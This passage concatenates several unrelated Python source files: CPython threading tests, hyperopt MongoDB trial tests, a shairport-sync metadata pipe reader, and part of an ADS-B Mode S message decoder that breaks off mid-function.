self.sema.release()
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>"%i, self, sema, mutex, numrunning)
threads.append(t)
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.isAlive())
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# this test is not applicable to jython since
# 1. Lock is equiv to RLock, so this weird sync behavior won't be seen
# 2. We use a weak hash map to map these threads
# 3. This behavior doesn't make sense for Jython since any foreign
# Java threads can use the same underlying locks, etc
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Acquiring an RLock forces an entry for the foreign
# thread to get made in the threading._active map.
r = threading.RLock()
r.acquire()
r.release()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.setDaemon(True) # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
sys.setcheckinterval(1)
try:
for i in xrange(1, 1000):
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
if is_jython:
del ThreadTests.test_enumerate_after_join
del ThreadTests.test_foreign_thread
del ThreadTests.test_PyThreadState_SetAsyncExc
def test_main():
test.test_support.run_unittest(ThreadTests)
if __name__ == "__main__":
test_main()
|
test_mongoexp.py
|
import six.moves.cPickle as pickle
import os
import signal
import subprocess
import sys
import traceback
import threading
import time
import unittest
import numpy as np
import nose
import nose.plugins.skip
from hyperopt.base import JOB_STATE_DONE, STATUS_OK
from hyperopt.mongoexp import parse_url
from hyperopt.mongoexp import MongoTrials
from hyperopt.mongoexp import MongoWorker
from hyperopt.mongoexp import ReserveTimeout
from hyperopt.mongoexp import as_mongo_str
from hyperopt.mongoexp import main_worker_helper
from hyperopt.mongoexp import MongoJobs
from hyperopt.fmin import fmin
from hyperopt import hp, rand
import hyperopt.tests.test_base
from hyperopt.tests.unit.test_domains import gauss_wave2
def skiptest(f):
def wrapper(*args, **kwargs):
raise nose.plugins.skip.SkipTest()
wrapper.__name__ = f.__name__
return wrapper
class TempMongo:
"""
Context manager for tests requiring a live database.
with TempMongo() as foo:
mj = foo.mongo_jobs('test1')
"""
def __init__(self, workdir="/tmp/hyperopt_test"):
self.workdir = workdir
def __enter__(self):
try:
open(self.workdir)
assert 0
except OSError:
subprocess.call(["mkdir", "-p", "%s/db" % self.workdir])
proc_args = [
"mongod",
"--dbpath=%s/db" % self.workdir,
"--noprealloc",
"--port=22334",
]
print("starting mongod", proc_args)
self.mongo_proc = subprocess.Popen(
proc_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=self.workdir, # this prevented mongod assertion fail
)
try:
interval = 0.125
while interval <= 2:
if interval > 0.125:
print("Waiting for mongo to come up")
time.sleep(interval)
interval *= 2
if self.db_up():
break
if self.db_up():
return self
else:
try:
os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
out, err = self.mongo_proc.communicate()
print(out, file=sys.stderr)
print(err, file=sys.stderr)
raise RuntimeError("No database connection", proc_args)
except Exception as e:
try:
os.kill(self.mongo_proc.pid, signal.SIGTERM)
except OSError:
pass # if it crashed there is no such process
raise e
def __exit__(self, *args):
os.kill(self.mongo_proc.pid, signal.SIGTERM)
self.mongo_proc.wait()
subprocess.call(["rm", "-Rf", self.workdir])
@staticmethod
def connection_string(dbname):
return as_mongo_str(f"localhost:22334/{dbname}/jobs")
@staticmethod
def mongo_jobs(dbname):
return MongoJobs.new_from_connection_str(TempMongo.connection_string(dbname))
def db_up(self):
try:
self.mongo_jobs("__test_db")
return True
except: # XXX: don't know what exceptions to put here
return False
def test_parse_url():
uris = [
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs",
"mongo://hyperopt:foobar@127.0.0.1:27017/hyperoptdb/jobs?authSource=db1",
]
expected = [
("mongo", "hyperopt", "foobar", "127.0.0.1", 27017, "hyperoptdb", "jobs", None),
(
"mongo",
"hyperopt",
"foobar",
"127.0.0.1",
27017,
"hyperoptdb",
"jobs",
"db1",
),
]
for i, uri in enumerate(uris):
assert parse_url(uri) == expected[i]
# -- If we can't create a TempMongo instance, then
# simply print what happened,
try:
with TempMongo() as temp_mongo:
pass
except OSError as e:
print(e, file=sys.stderr)
print(
("Failed to create a TempMongo context," " skipping all mongo tests."),
file=sys.stderr,
)
if "such file" in str(e):
print("Hint: is mongod executable on path?", file=sys.stderr)
raise nose.SkipTest()
class TestMongoTrials(hyperopt.tests.test_base.TestTrials):
def setUp(self):
self.temp_mongo = TempMongo()
self.temp_mongo.__enter__()
self.trials = MongoTrials(
self.temp_mongo.connection_string("foo"), exp_key=None
)
def tearDown(self, *args):
self.temp_mongo.__exit__(*args)
def with_mongo_trials(f, exp_key=None):
def wrapper():
with TempMongo() as temp_mongo:
trials = MongoTrials(temp_mongo.connection_string("foo"), exp_key=exp_key)
print("Length of trials: ", len(trials.results))
f(trials)
wrapper.__name__ = f.__name__
return wrapper
def _worker_thread_fn(host_id, n_jobs, timeout, dbname="foo", logfilename=None):
mw = MongoWorker(
mj=TempMongo.mongo_jobs(dbname),
logfilename=logfilename,
workdir="mongoexp_test_dir",
)
try:
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
except ReserveTimeout:
print("worker timed out:", host_id)
pass
def with_worker_threads(n_threads, dbname="foo", n_jobs=sys.maxsize, timeout=10.0):
"""
Decorator that will run a test with some MongoWorker threads in flight
"""
def newth(ii):
return threading.Thread(
target=_worker_thread_fn, args=(("hostname", ii), n_jobs, timeout, dbname)
)
def deco(f):
def wrapper(*args, **kwargs):
# --start some threads
threads = list(map(newth, list(range(n_threads))))
[th.start() for th in threads]
try:
return f(*args, **kwargs)
finally:
[th.join() for th in threads]
wrapper.__name__ = f.__name__ # -- nose requires test in name
return wrapper
return deco
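# Illustrative usage sketch (not one of the original tests): the two helpers
# above are meant to be stacked, so that a test body receives a MongoTrials
# handle while MongoWorker threads drain the job queue in the background, e.g.
#
#     @with_mongo_trials
#     @with_worker_threads(2)
#     def test_something(trials):
#         assert len(trials.results) >= 0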
@with_mongo_trials
def test_with_temp_mongo(trials):
pass # -- just verify that the decorator can run
@with_mongo_trials
def test_new_trial_ids(trials):
a = trials.new_trial_ids(1)
b = trials.new_trial_ids(2)
c = trials.new_trial_ids(3)
assert len(a) == 1
assert len(b) == 2
assert len(c) == 3
s = set()
s.update(a)
s.update(b)
s.update(c)
assert len(s) == 6
@with_mongo_trials
def test_attachments(trials):
blob = b"abcde"
assert "aname" not in trials.attachments
trials.attachments["aname"] = blob
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob
assert trials.attachments["aname"] == blob
blob2 = b"zzz"
trials.attachments["aname"] = blob2
assert "aname" in trials.attachments
assert trials.attachments["aname"] == blob2
assert trials.attachments["aname"] == blob2
del trials.attachments["aname"]
assert "aname" not in trials.attachments
@with_mongo_trials
def test_delete_all_on_attachments(trials):
trials.attachments["aname"] = "a"
trials.attachments["aname2"] = "b"
assert "aname2" in trials.attachments
trials.delete_all()
assert "aname" not in trials.attachments
assert "aname2" not in trials.attachments
def test_handles_are_independent():
with TempMongo() as tm:
t1 = tm.mongo_jobs("t1")
t2 = tm.mongo_jobs("t2")
assert len(t1) == 0
assert len(t2) == 0
# test that inserting into t1 doesn't affect t2
t1.insert({"a": 7})
assert len(t1) == 1
assert len(t2) == 0
def passthrough(x):
assert os.path.split(os.getcwd()).count("mongoexp_test_dir") == 1, (
"cwd is %s" % os.getcwd()
)
return x
class TestExperimentWithThreads(unittest.TestCase):
@staticmethod
def worker_thread_fn(host_id, n_jobs, timeout):
mw = MongoWorker(
mj=TempMongo.mongo_jobs("foodb"),
logfilename=None,
workdir="mongoexp_test_dir",
)
while n_jobs:
mw.run_one(host_id, timeout, erase_created_workdir=True)
print("worker: %s ran job" % str(host_id))
n_jobs -= 1
@staticmethod
def fmin_thread_fn(space, trials, max_evals, seed):
fmin(
fn=passthrough,
space=space,
algo=rand.suggest,
trials=trials,
rstate=np.random.default_rng(seed),
max_evals=max_evals,
return_argmin=False,
)
def test_seeds_AAB(self):
# launch 3 simultaneous experiments with seeds A, A, B.
# Verify all experiments run to completion.
# Verify first two experiments run identically.
# Verify third experiment runs differently.
exp_keys = ["A0", "A1", "B"]
seeds = [1, 1, 2]
n_workers = 2
jobs_per_thread = 6
# -- total jobs = 2 * 6 = 12
# -- divided by 3 experiments: 4 jobs per fmin
max_evals = (n_workers * jobs_per_thread) // len(exp_keys)
# -- should not matter which domain is used here
domain = gauss_wave2()
pickle.dumps(domain.expr)
pickle.dumps(passthrough)
worker_threads = [
threading.Thread(
target=TestExperimentWithThreads.worker_thread_fn,
args=(("hostname", ii), jobs_per_thread, 30.0),
)
for ii in range(n_workers)
]
with TempMongo() as tm:
mj = tm.mongo_jobs("foodb")
print(mj)
trials_list = [
MongoTrials(tm.connection_string("foodb"), key) for key in exp_keys
]
fmin_threads = [
threading.Thread(
target=TestExperimentWithThreads.fmin_thread_fn,
args=(domain.expr, trials, max_evals, seed),
)
for seed, trials in zip(seeds, trials_list)
]
try:
[th.start() for th in worker_threads + fmin_threads]
finally:
print("joining worker threads...")
[th.join() for th in worker_threads + fmin_threads]
# -- not using an exp_key gives a handle to all the trials
# in foodb
all_trials = MongoTrials(tm.connection_string("foodb"))
self.assertEqual(len(all_trials), n_workers * jobs_per_thread)
# Verify that the fmin calls terminated correctly:
for trials in trials_list:
self.assertEqual(
trials.count_by_state_synced(JOB_STATE_DONE), max_evals
)
self.assertEqual(
trials.count_by_state_unsynced(JOB_STATE_DONE), max_evals
)
self.assertEqual(len(trials), max_evals)
# Verify that the first two experiments match.
# (Do these need sorting by trial id?)
trials_A0, trials_A1, trials_B0 = trials_list
self.assertEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_A1.trials],
)
# Verify that the last experiment does not match.
# (Do these need sorting by trial id?)
self.assertNotEqual(
[t["misc"]["vals"] for t in trials_A0.trials],
[t["misc"]["vals"] for t in trials_B0.trials],
)
def objective_with_attachments(x: float):
"""Objective function that includes extra information as attachments and
dictionary attributes."""
return {
"loss": x ** 2,
"status": STATUS_OK,
"extra_stuff": {"type": None, "value": [0, 1, 2]},
"attachments": {"time": pickle.dumps(time.time)},
}
def fmin_thread_fn(space, mongo_trials: MongoTrials, max_evals: int):
fmin(
fn=objective_with_attachments,
space=space,
algo=rand.suggest,
trials=mongo_trials,
rstate=np.random.default_rng(),
max_evals=max_evals,
return_argmin=False,
)
def test_trial_attachments():
exp_key = "A"
with TempMongo() as tm:
mj = tm.mongo_jobs("foo")
trials = MongoTrials(tm.connection_string("foo"), exp_key=exp_key)
space = hp.uniform("x", -10, 10)
max_evals = 3
fmin_thread = threading.Thread(
target=fmin_thread_fn, args=(space, trials, max_evals)
)
fmin_thread.start()
mw = MongoWorker(mj=mj, logfilename=None, workdir="mongoexp_test_dir")
n_jobs = max_evals
while n_jobs:
try:
mw.run_one("hostname", 10.0, erase_created_workdir=True)
print("worker: ran job")
except Exception as exc:
print(f"worker: encountered error : {str(exc)}")
traceback.print_exc()
n_jobs -= 1
fmin_thread.join()
all_trials = MongoTrials(tm.connection_string("foo"))
assert len(all_trials) == max_evals
assert trials.count_by_state_synced(JOB_STATE_DONE) == max_evals
assert trials.count_by_state_unsynced(JOB_STATE_DONE) == max_evals
class FakeOptions:
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
# -- assert that the test raises a ReserveTimeout within 5 seconds
@nose.tools.timed(10.0) # XXX: this needs a suspiciously long timeout
@nose.tools.raises(ReserveTimeout)
@with_mongo_trials
def test_main_worker(trials):
options = FakeOptions(
max_jobs=1,
# XXX: sync this with TempMongo
mongo=as_mongo_str("localhost:22334/foodb"),
reserve_timeout=1,
poll_interval=0.5,
workdir=None,
exp_key="foo",
last_job_timeout=None,
)
# -- check that it runs
# and that the reserve timeout is respected
main_worker_helper(options, ())
|
shairport_sync_pipe_reader.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# cat /tmp/shairport-sync-metadata | python3 output_text.py
import base64
import binascii
import codecs
import json
import logging
import math
import os
import re
import shutil
import sys
import tempfile
import time
from multiprocessing import Process
try:
from asciimatics.renderers import ImageFile # pip install asciimatics
asciimatics_avail = True
except ImportError:
# print('-W- for asciiart: [sudo] pip[3] install asciimatics', file=sys.stderr)
asciimatics_avail = False
# from shairport_sync_metadata import VERSION as shairport_sync_metadata_version
# configure tempfile dir
name = os.path.basename(__file__)
tempdirname = tempfile.mkdtemp(
prefix='shairport-sync-metadata-', dir=tempfile.tempdir)
# set up logging to file
logging_filename = '{}.log'.format(
os.path.join(tempdirname, os.path.basename(__file__)))
# print('-I- Using log file {}'.format(logging_filename), file=sys.stderr)
logging.basicConfig(
level=logging.DEBUG,
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M',
filename=logging_filename,
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
logger = logging.getLogger(__name__)
# logger.info('testing')
# started with code from
# https://github.com/surekap/MMM-ShairportMetadata/blob/master/shairport-metadata.py
def start_item(line):
regex = r"<item><type>(([A-Fa-f0-9]{2}){4})</type><code>(([A-Fa-f0-9]{2}){4})</code><length>(\d*)</length>"
matches = re.findall(regex, line)
#print(matches)
# python2 only # typ = matches[0][0].decode('hex')
# python2 only # code = matches[0][2].decode('hex')
#typ = codecs.decode(matches[0][0], 'hex').decode()
#code = codecs.decode(matches[0][2], 'hex').decode()
#typ = base64.b16decode(matches[0][0], casefold=True).decode()
#code = base64.b16decode(matches[0][2], casefold=True).decode()
typ = str(binascii.unhexlify(matches[0][0]), 'ascii')
code = str(binascii.unhexlify(matches[0][2]), 'ascii')
length = int(matches[0][4])
return (typ, code, length)
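# Minimal sanity-check sketch (the sample line below is hand-crafted, not read
# from a real pipe): type and code are four ASCII bytes hex-encoded, so
# 73736e63 -> 'ssnc' and 6d64656e -> 'mden'.
def _demo_start_item():
    sample = '<item><type>73736e63</type><code>6d64656e</code><length>0</length>'
    assert start_item(sample) == ('ssnc', 'mden', 0)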
def start_data(line):
# logger.debug(line)
try:
assert line == '<data encoding="base64">\n'
except AssertionError:
if line.startswith("<data"):
return 0
return -1
return 0
def read_data(line, length):
# convert to base64 size
b64size = 4 * math.ceil((length) / 3)
#if length < 100: print (line, end="")
try:
data = base64.b64decode(line[:b64size])
# Assume it is a PICT and do not attempt to decode the binary data
if length > 1000:
# print (data[:4])
return data
data = data.decode()
except TypeError:
data = ""
pass
except UnicodeDecodeError:
# print(data)
data = ""
pass
return data
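# Quick arithmetic check (illustrative only): base64 expands every 3 raw bytes
# into 4 characters, so a 5-byte payload occupies 4 * ceil(5 / 3) = 8
# characters on the pipe; read_data() uses that bound to trim the line.
def _demo_read_data():
    line = base64.b64encode(b'hello').decode() + '</data></item>\n'
    assert read_data(line, 5) == 'hello'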
def guessImageMime(magic):
# print(magic[:4])
if magic.startswith(b'\xff\xd8'):
return 'image/jpeg'
    elif magic.startswith(b'\x89PNG\r\n\x1a\n'):
return 'image/png'
else:
return "image/jpg"
def main():
metadata = {}
fi = sys.stdin
while True:
        line = fi.readline()
if not line: #EOF
break
#print(line, end="")
sys.stdout.flush()
if not line.startswith("<item>"):
continue
typ, code, length = start_item(line)
#print (typ, code, length)
data = ""
if (length > 0):
line2 = fi.readline()
#print('line2:{}'.format(line2), end="")
r = start_data(line2)
if (r == -1):
continue
line3 = fi.readline()
#print('line3:{}'.format(line3), end="")
data = read_data(line3, length)
# Everything read
if (typ == 'core'):
#logger.debug(code)
#logger.debug(data)
if (code == "asal"):
metadata['songalbum'] = data
# print(data)
elif (code == "asar"):
metadata['songartist'] = data
#elif (code == "ascm"):
# metadata['Comment'] = data
#elif (code == "asgn"):
# metadata['Genre'] = data
elif (code == "minm"):
metadata['itemname'] = data
#elif (code == "ascp"):
# metadata['Composer'] = data
#elif (code == "asdt"):
# metadata['File Kind'] = data
#elif (code == "assn"):
# metadata['Sort as'] = data
#elif (code == "clip"):
# metadata['IP'] = data
if (typ == "ssnc" and code == "prgr"):
state_changed('play', None)
if (typ == "ssnc" and code == "pfls"):
metadata = {}
# print(json.dumps({}))
state_changed('pause', None)
sys.stdout.flush()
if (typ == "ssnc" and code == "pend"):
metadata = {}
# print(json.dumps({}))
sys.stdout.flush()
if (typ == "ssnc" and code == "PICT"):
# print(typ, code, length, len(data))
if (len(data) == 0):
# print(json.dumps({"image": ""}))
pass
else:
mime = guessImageMime(data)
# print(mime)
if (mime == 'image/png'):
temp_file = tempfile.NamedTemporaryFile(
prefix="image_",
suffix=".png",
delete=False,
dir=tempdirname)
elif (mime == 'image/jpeg'):
temp_file = tempfile.NamedTemporaryFile(
prefix="image_",
suffix=".jpeg",
delete=False,
dir=tempdirname)
else:
temp_file = tempfile.NamedTemporaryFile(
prefix="image_",
suffix=".jpg",
delete=False,
dir=tempdirname)
with temp_file as file:
file.write(data)
file.close()
notify_album_artwork(temp_file.name)
# logger.info('Wrote file {}'.format(temp_file.name))
if asciimatics_avail:
# logger.debug('loading image for ascii art')
asciimatics_img = ImageFile(temp_file.name, height=22, colours=16)
# print(asciimatics_img)
sys.stdout.flush()
if (typ == "ssnc" and code == "mden"):
# logger.debug('metadata end')
# print(json.dumps(metadata))
state_changed('play', metadata)
sys.stdout.flush()
metadata = {}
# this never gets called in current code <- original dev comment
# actually gets called, workflow: start music on airplay, switch to bluetooth device, whoops
# tempdir is not defined
# if tempdir is not None:
# shutil.rmtree(tempdir)
previous_metadata = []
pause_process = []
def state_changed(state, metadata):
global previous_metadata
if metadata is not None:
previous_metadata = metadata
else:
metadata = previous_metadata
if metadata is not None:
if state == 'play':
for p in pause_process:
if p.is_alive():
p.kill()
pause_process.remove(p)
notify(state, metadata)
elif state == 'pause':
process = Process(target=__state_changed_to_pause, args=(state, metadata, ))
process.start()
pause_process.append(process)
else:
print('metadata was None!')
def __state_changed_to_pause(state, metadata):
time.sleep(3)
notify(state, metadata)
def notify(state, metadata):
track_information = ''
if 'songartist' in metadata:
track_information += metadata['songartist']
if 'itemname' in metadata:
if len(track_information) > 0:
track_information += ' - '
track_information += metadata['itemname']
# shairport_sync_onevent.set_track_information(state, track_information)
os.system('/home/pi/scripts/github/media_frame/scripts/onevent.py ShairportSync')
def notify_album_artwork(path):
# shairport_sync_onevent.set_album_artwork(path)
pass
# cat /tmp/shairport-sync-metadata | /usr/bin/python3 ./output_text.py
# cat /tmp/shairport-sync-metadata | python3 ~/scripts/github/shairport-sync-metadata-python/bin/output_text.py
if __name__ == "__main__":
main()
|
decode.py
|
# mypy: ignore-errors
# This line can be removed when typing in pyModeS is complete and released.
from __future__ import annotations
import heapq
import logging
import os
import socket
import sys
import threading
import time
from datetime import datetime, timedelta, timezone
from operator import itemgetter
from pathlib import Path
from typing import (
Any,
Callable,
Dict,
Iterable,
Iterator,
Optional,
TextIO,
TypeVar,
Union,
cast,
)
import pyModeS as pms
from tqdm.rich import tqdm
import pandas as pd
from ...core import Flight, Traffic
from ...data.basic.airports import Airport
if sys.version_info >= (3, 8):
from typing import TypedDict
else:
from typing_extensions import TypedDict
Decoder = TypeVar("Decoder", bound="ModeS_Decoder")
def next_msg(chunk_it: Iterator[bytes]) -> Iterator[bytes]:
data = b""
for chunk in chunk_it:
data += chunk
while len(data) >= 23:
it = data.find(0x1A)
if it < 0:
break
data = data[it:]
if len(data) < 23:
break
if data[1] == 0x33:
yield data[:23]
data = data[23:]
continue
elif data[1] == 0x32:
data = data[16:]
continue
elif data[1] == 0x31:
data = data[11:]
continue
elif data[1] == 0x34:
data = data[23:]
continue
else:
data = data[1:]
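# Illustrative sketch (not part of the original module): next_msg() walks
# Beast-format frames, where 0x1a marks a frame start and the second byte
# selects the frame size -- 0x31 (11 bytes) and 0x32 (16 bytes) are short
# frames that are skipped, 0x33 is a 23-byte long Mode S frame that is
# yielded, and 0x34 is a 23-byte status frame that is skipped.
def _demo_next_msg() -> None:
    frame = b"\x1a\x33" + bytes(21)  # synthetic 23-byte long frame, zero payload
    assert list(next_msg(iter([frame]))) == [frame]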
def decode_time_default(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
return datetime.now(timezone.utc)
def decode_time_radarcape(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
timestamp = int(msg[4:16], 16)
nanos = timestamp & 0x00003FFFFFFF
secs = timestamp >> 30
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
now += timedelta(seconds=secs, microseconds=nanos / 1000)
return now
def decode_time_dump1090(
msg: str, time_0: Optional[datetime] = None
) -> datetime:
now = datetime.now(timezone.utc)
if time_0 is not None:
now = time_0
else:
now = now.replace(hour=0, minute=0, second=0, microsecond=0)
timestamp = int(msg[4:16], 16)
# dump1090/net_io.c => time (in 12Mhz ticks)
now += timedelta(seconds=timestamp / 12e6)
return now
decode_time: dict[str, Callable[[str, Optional[datetime]], datetime]] = {
"radarcape": decode_time_radarcape,
"dump1090": decode_time_dump1090,
"default": decode_time_default,
}
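# Minimal sketch (hand-crafted hex, not a real capture): in the "dump1090"
# format the 12 hex characters at positions 4..16 carry a tick counter at
# 12 MHz, so 0x000000b71b00 == 12_000_000 ticks == one second after time_0.
def _demo_decode_time_dump1090() -> datetime:
    msg = "1a33" + "000000b71b00" + "00" * 15  # placeholder frame hex
    time_0 = datetime(2023, 1, 1, tzinfo=timezone.utc)
    return decode_time_dump1090(msg, time_0)  # 2023-01-01 00:00:01+00:00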
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the to_be_stopped() condition."""
def __init__(self, *args: Any, **kwargs: Any) -> None:
super().__init__(*args, **kwargs)
# self.daemon = True # is it redundant?
self._stop_event = threading.Event()
def stop(self) -> None:
self._stop_event.set()
def to_be_stopped(self) -> bool:
return self._stop_event.is_set()
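# Minimal usage sketch (the worker below is hypothetical, not used by the
# decoder): a thread target polls to_be_stopped() and exits cooperatively.
def _demo_stoppable_thread() -> None:
    def worker() -> None:
        me = cast(StoppableThread, threading.current_thread())
        while not me.to_be_stopped():
            time.sleep(0.05)

    th = StoppableThread(target=worker)
    th.start()
    th.stop()
    th.join()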
# total=False means that some keys can be absent
class Entry(TypedDict, total=False):
timestamp: datetime
icao24: str
callsign: Optional[str]
latitude: Optional[float]
longitude: Optional[float]
altitude: Optional[int]
geoaltitude: Optional[int]
groundspeed: Optional[int]
track: Optional[float]
vertical_rate: Optional[int]
onground: Optional[bool]
squawk: Optional[int]
# BDS 4,0
selected_fms: Optional[int]
selected_mcp: Optional[int]
barometric_setting: Optional[int]
# BDS 4,4
humidity: Optional[int]
pressure: Optional[int]
temperature: Optional[int]
turbulence: Optional[int]
windspeed: Optional[int]
winddirection: Optional[int]
# BDS 4,5
wind_shear: Optional[int]
microburst: Optional[int]
icing: Optional[int]
wake_vortex: Optional[int]
radio_height: Optional[int]
# BDS 5,0
roll: Optional[float]
TAS: Optional[int]
track_rate: Optional[float]
# BDS 6,0
IAS: Optional[int]
heading: Optional[float]
Mach: Optional[float]
vertical_rate_barometric: Optional[int]
vertical_rate_inertial: Optional[int]
# Uncertainty
HPL: Optional[int]
RCu: Optional[int]
RCv: Optional[int]
HCR: Optional[int]
VPL: Optional[int]
HVE: Optional[int]
VVE: Optional[int]
HFM: Optional[int]
VFM: Optional[int]
EPU: Optional[int]
VEPU: Optional[int]
version: Optional[int]
pHCR: Optional[int]
pVPL: Optional[int]
sil_base: Optional[int]
class Aircraft(object):
def __init__(self, icao24: str, lat0: float, lon0: float) -> None:
self.icao24 = icao24
self._callsign: Optional[str] = None
self._flight: Optional[Flight] = None
self.cumul: list[Entry] = []
self.t0: Optional[datetime] = None
self.t1: Optional[datetime] = None
self.tpos: Optional[datetime] = None
self.m0: Optional[str] = None
self.m1: Optional[str] = None
self.lat: Optional[float] = None
self.lon: Optional[float] = None
self.alt: Optional[int] = None
self.trk: Optional[float] = None
self.spd: Optional[int] = None
self.lat0: float = lat0
self.lon0: float = lon0
self.version: Optional[int] = None
self.nic_a: Optional[int] = None
self.nic_bc: Optional[int] = None
self.nic_s: Optional[int] = None
self.lock = threading.Lock()
@property
def flight(self) -> Optional[Flight]:
with self.lock: # access then clear not thread-safe, hence the lock
df = pd.DataFrame.from_records(self.cumul)
self.cumul.clear()
if self._flight is not None:
if len(df) > 0:
df = pd.concat([self._flight.data, df], sort=False)
else:
df = self._flight.data
if self.version is not None:
# remove columns added by nuc_p, nuc_r
if "HPL" in df.columns:
df = df.drop(columns=["HPL", "RCu", "RCv"])
if "HVE" in df.columns:
df = df.drop(columns=["HVE", "VVE"])
if len(df) == 0:
return None
if 'callsign' in set(df.columns):
self._flight = Flight(
df.assign(
callsign=df.callsign.replace("", None)
.fillna(method="ffill")
.fillna(method="bfill")
)
)
else:
self._flight = Flight(
df.assign(
callsign=None
)
)
return self._flight
@property
def callsign(self) -> Optional[str]:
return self._callsign
@callsign.setter
def callsign(self, args: tuple[datetime, str]) -> None:
t, msg = args
callsign = pms.adsb.callsign(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, callsign=self._callsign)
)
@property
def speed(self) -> None:
pass
@speed.setter
def speed(self, args: tuple[datetime, str]) -> None:
t, msg = args
vdata = pms.adsb.velocity(msg)
if vdata is None:
return
spd, trk, roc, tag = vdata
if tag != "GS":
# does it ever happen...
return
if (spd is None) or (trk is None):
return
self.spd = spd
self.trk = trk
delta = pms.adsb.altitude_diff(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
groundspeed=spd,
track=trk,
vertical_rate=roc,
)
)
if delta is not None and self.alt is not None:
self.cumul[-1]["geoaltitude"] = self.alt + delta
@property
def position(self) -> None:
pass
@position.setter
def position(self, args: tuple[datetime, str]) -> None:
t, msg = args
oe = pms.adsb.oe_flag(msg)
setattr(self, "m" + str(oe), msg)
setattr(self, "t" + str(oe), t)
if (
self.t0 is not None
and self.t1 is not None
and abs((self.t0 - self.t1).total_seconds()) < 10
):
latlon = pms.adsb.position(
self.m0, self.m1, self.t0, self.t1, self.lat0, self.lon0
)
else:
latlon = None
if latlon is not None:
self.tpos = t
self.lat, self.lon = latlon
self.alt = pms.adsb.altitude(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
altitude=self.alt,
onground=False,
)
)
@property
def surface(self) -> None:
pass
@surface.setter
def surface(self, args: tuple[datetime, str]) -> None:
t, msg = args
self.lat, self.lon = pms.adsb.surface_position_with_ref(
